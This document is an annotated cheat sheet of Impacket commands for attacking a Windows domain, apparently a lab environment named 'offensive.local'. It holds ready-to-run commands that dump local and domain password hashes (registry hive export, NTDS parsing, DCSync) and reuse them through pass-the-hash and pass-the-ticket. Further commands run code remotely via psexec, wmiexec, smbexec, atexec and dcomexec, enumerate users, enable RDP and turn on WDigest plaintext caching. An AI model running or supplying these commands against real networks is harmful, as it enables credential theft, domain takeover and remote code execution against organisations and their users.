workgroup（本地账户，域字段留空）= ./Administrator
Domain（域账户，域名/用户名）= offensive/Administrator

impacket-secretsdump

在目标主机（含域控）上导出本机 SAM hash 与 LSA secrets（这里拿不到域用户的 NTDS hash，域用户见下一节）
REM Export the three hives that hold local credential material. Needs an
REM elevated (administrator) shell on the target.
REM   SAM      -> NT hashes of local accounts
REM   SECURITY -> LSA secrets (machine account, service passwords, cached domain logons)
REM   SYSTEM   -> the boot key that decrypts the other two
reg save HKLM\SECURITY security.hiv
reg save HKLM\SAM sam.hiv
reg save HKLM\SYSTEM system.hiv
REM Parse the saved hives offline. "LOCAL" means no host is contacted, so this
REM can also be done on the attacking box with impacket-secretsdump after
REM copying the three files over. Output is local SAM / LSA data only; domain
REM users live in ntds.dit (next recipe). On a DC the SAM hive holds just the
REM DSRM/local accounts, so the useful part is usually the LSA secrets section.
secretsdump.exe -system system.hiv -security security.hiv -sam sam.hiv LOCAL

DC 导出域内所有用户 hash（离线解析 ntds.dit，需先从卷影副本/ntdsutil IFM 取得 ntds.dit）
REM Offline dump of every domain account hash from the directory database.
REM ntds.dit is locked while the NTDS service is running and cannot be copied
REM directly; it has to be taken from a Volume Shadow Copy or an ntdsutil IFM
REM snapshot on the DC. The SYSTEM hive must come from the *same* DC: it holds
REM the boot key that unwraps the PEK protecting the stored hashes.
reg save HKLM\SYSTEM system.hiv
REM "LOCAL" = parse files on disk, no network. Expect output for every user and
REM computer account plus Kerberos keys.
secretsdump.exe -ntds ntds.dit -system system.hiv LOCAL

secretsdump 远程（DCSync）查看域内所有用户hash —— 密码认证

# Remote dump of all domain hashes via directory replication (DRSUAPI, i.e.
# DCSync). The account needs replication rights (Domain Admins here).
# -dc-ip pins the DC so the domain name does not have to resolve from this box.
# NOTE(review): the password is on the command line and ends up in shell
# history and `ps` output; leaving ":Admin12345" off makes impacket prompt
# for it instead. Replication requests from a host that is not a DC are a
# well-known DCSync detection — assume this is logged on the DC.
impacket-secretsdump -dc-ip 192.168.3.110 offensive/Administrator:Admin12345@offensive.local

secretsdump 远程（DCSync）查看域内所有用户hash —— hash 认证（pass-the-hash）

# Same DCSync dump, authenticating with the NT hash instead of a password.
# -hashes takes LMHASH:NTHASH; the empty part before the colon means "no LM
# hash", which is the normal case on current Windows.
impacket-secretsdump -dc-ip 192.168.3.110 -hashes :ccef208c6485269c20db2cad21734fe7 offensive/Administrator@offensive.local

secretsdump查看Administrator用户hash

impacket-psexec 票据传递

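# Pass-the-ticket: obtain a TGT from the KDC using only the NT hash
# (overpass-the-hash), then reach the DC over Kerberos instead of NTLM.
# -dc-ip is given so the KDC is reachable even when offensive.local does not
# resolve from this host — the other recipes in this file pin the DC the same way.
impacket-getTGT -dc-ip 192.168.3.110 -hashes :ccef208c6485269c20db2cad21734fe7 offensive.local/administrator

# getTGT writes <username>.ccache into the current directory; KRB5CCNAME tells
# the Kerberos library which cache to use. Kerberos requires the target's FQDN
# (DC.offensive.local, not the IP) and a clock within the KDC's skew window,
# otherwise the ticket is rejected. -codec gbk decodes the Chinese console output.
export KRB5CCNAME=administrator.ccache
impacket-psexec -k -no-pass -dc-ip 192.168.3.110 -codec gbk offensive.local/Administrator@DC.offensive.local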

impacket-psexec 命令执行

# Run one command as SYSTEM through psexec. impacket uploads a service binary
# to ADMIN$ and installs a service, so this needs local admin and writable
# ADMIN$ and is noisy (service install events, file dropped on disk).
impacket-psexec -codec gbk offensive/administrator:Admin12345@192.168.3.110 "whoami /user"

impacket-psexec pth命令执行

# psexec with pass-the-hash: same service-based execution, NTLM auth with the
# NT hash (LM part left empty before the colon).
impacket-psexec -codec gbk -hashes :ccef208c6485269c20db2cad21734fe7 offensive/administrator@192.168.3.110 "whoami /user"

impacket-wmiexec 命令执行

# Execute via WMI (Win32_Process over DCOM, port 135 + dynamic RPC). No
# service is installed, but command output is written to a file on ADMIN$
# and read back over SMB (445), so both ports must be reachable.
impacket-wmiexec -codec gbk offensive/administrator:Admin12345@192.168.3.110 "whoami /user"

impacket-wmiexec pth命令执行

# wmiexec with pass-the-hash; runs in the user's context rather than SYSTEM.
impacket-wmiexec -codec gbk -hashes :ccef208c6485269c20db2cad21734fe7 offensive/administrator@192.168.3.110 "whoami /user"

impacket-atexec 命令执行

# Execute via the Task Scheduler service (ATSVC): a scheduled task is created,
# run and deleted; output comes back through ADMIN$. Task creation/deletion is
# logged on the target.
impacket-atexec -codec gbk offensive/administrator:Admin12345@192.168.3.110 "whoami /user"

impacket-smbexec 命令执行

# No command given -> semi-interactive shell. Each command typed creates a
# temporary service that runs cmd.exe and writes output to a share, then
# deletes it, so every line produces a service-install event. Nothing is
# uploaded to disk, unlike psexec.
impacket-smbexec -codec gbk offensive/administrator:Admin12345@192.168.3.110

impacket-smbexec pth命令执行

# smbexec with pass-the-hash and a single command.
impacket-smbexec -codec gbk -hashes :ccef208c6485269c20db2cad21734fe7 offensive/administrator@192.168.3.110 "whoami /user"

impacket-dcomexec 命令执行

# Execute through a DCOM object (default object is ShellWindows; others are
# selectable with -object). Needs 135 + dynamic RPC ports; output is read back
# via a share like wmiexec. Without a command this opens a semi-interactive shell.
impacket-dcomexec -codec gbk offensive/administrator:Admin12345@192.168.3.110

# Same via pass-the-hash, single command.
impacket-dcomexec -codec gbk -hashes :ccef208c6485269c20db2cad21734fe7 offensive/administrator@192.168.3.110 "whoami /user"

impacket-lookupsid-查看用户sid

# Enumerate users and groups by brute-forcing RIDs over LSARPC (SID lookup).
# Prints the domain SID first, then RID -> name mappings. Works with
# low-privilege credentials; here authenticated with the NT hash.
impacket-lookupsid -hashes :ccef208c6485269c20db2cad21734fe7 offensive/administrator@192.168.3.110

impacket-GetADUsers-查询所有用户

# List domain users over LDAP on the DC (port 389). -all returns every user
# rather than the default filtered set; columns include pwdLastSet and
# lastLogon. Any domain account can run this; admin rights are not required.
impacket-GetADUsers -dc-ip 192.168.3.110 -all offensive.local/Administrator:Admin12345

impacket-GetADComputers-查询所有计算机

# List computer accounts over LDAP. NOTE(review): this script only ships with
# recent impacket releases — check it exists before relying on it.
impacket-GetADComputers -dc-ip 192.168.3.110 offensive.local/Administrator:Admin12345

impacket-reg 查看注册表信息

  • 查看3389端口
# Read the RDP listener port through the Remote Registry service (needs admin;
# impacket will try to start RemoteRegistry if it is stopped). "PortNumber"
# is the port RDP listens on — 0xd3d means the default 3389.
impacket-reg offensive/administrator:Admin12345@192.168.3.173 query -v "PortNumber" -keyName "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp"

  • 开启3389
# Enable Remote Desktop by clearing fDenyTSConnections. This only switches the
# listener on: the Windows Firewall "Remote Desktop" rule group and the NLA
# requirement are separate settings, so 3389 may still be unreachable afterwards.
# Persistent change on the target — record it for cleanup.
impacket-reg offensive/administrator:Admin12345@192.168.3.173 add -vt REG_DWORD -vd 0 -v fDenyTSConnections -keyName "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server"

  • 开启 WDigest 明文缓存（用于之后抓取明文密码，仅对修改后的新登录生效）
# Turn WDigest credential caching back on. "./Administrator" is a *local*
# account (empty domain), authenticated here with its NT hash.
# UseLogonCredential=1 makes LSASS keep plaintext passwords only for logons
# that happen *after* the change; existing sessions are unaffected, so a new
# logon (or reboot) is needed before a memory dump shows plaintext.
# This is a persistent hardening downgrade and a heavily monitored registry
# key — revert it to 0 once it is no longer needed.
impacket-reg -hashes ':ccef208c6485269c20db2cad21734fe7' ./Administrator@192.168.3.173 add -keyName 'HKLM\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest' -vt 'REG_DWORD' -vd '1' -v 'UseLogonCredential'

impacket 常见报错

[-] Error in bindRequest -> invalidCredentials: 8009030C: LdapErr: DSID-0C0906A1, comment: AcceptSecurityContext error, data 52e, v3839
含义：LDAP 绑定（认证）被拒绝，"data 52e" 表示用户名或密码错误。检查 -dc-ip、域名写法（offensive 与 offensive.local）、用户名以及密码/hash 是否正确；注意反复重试会触发域账户锁定策略。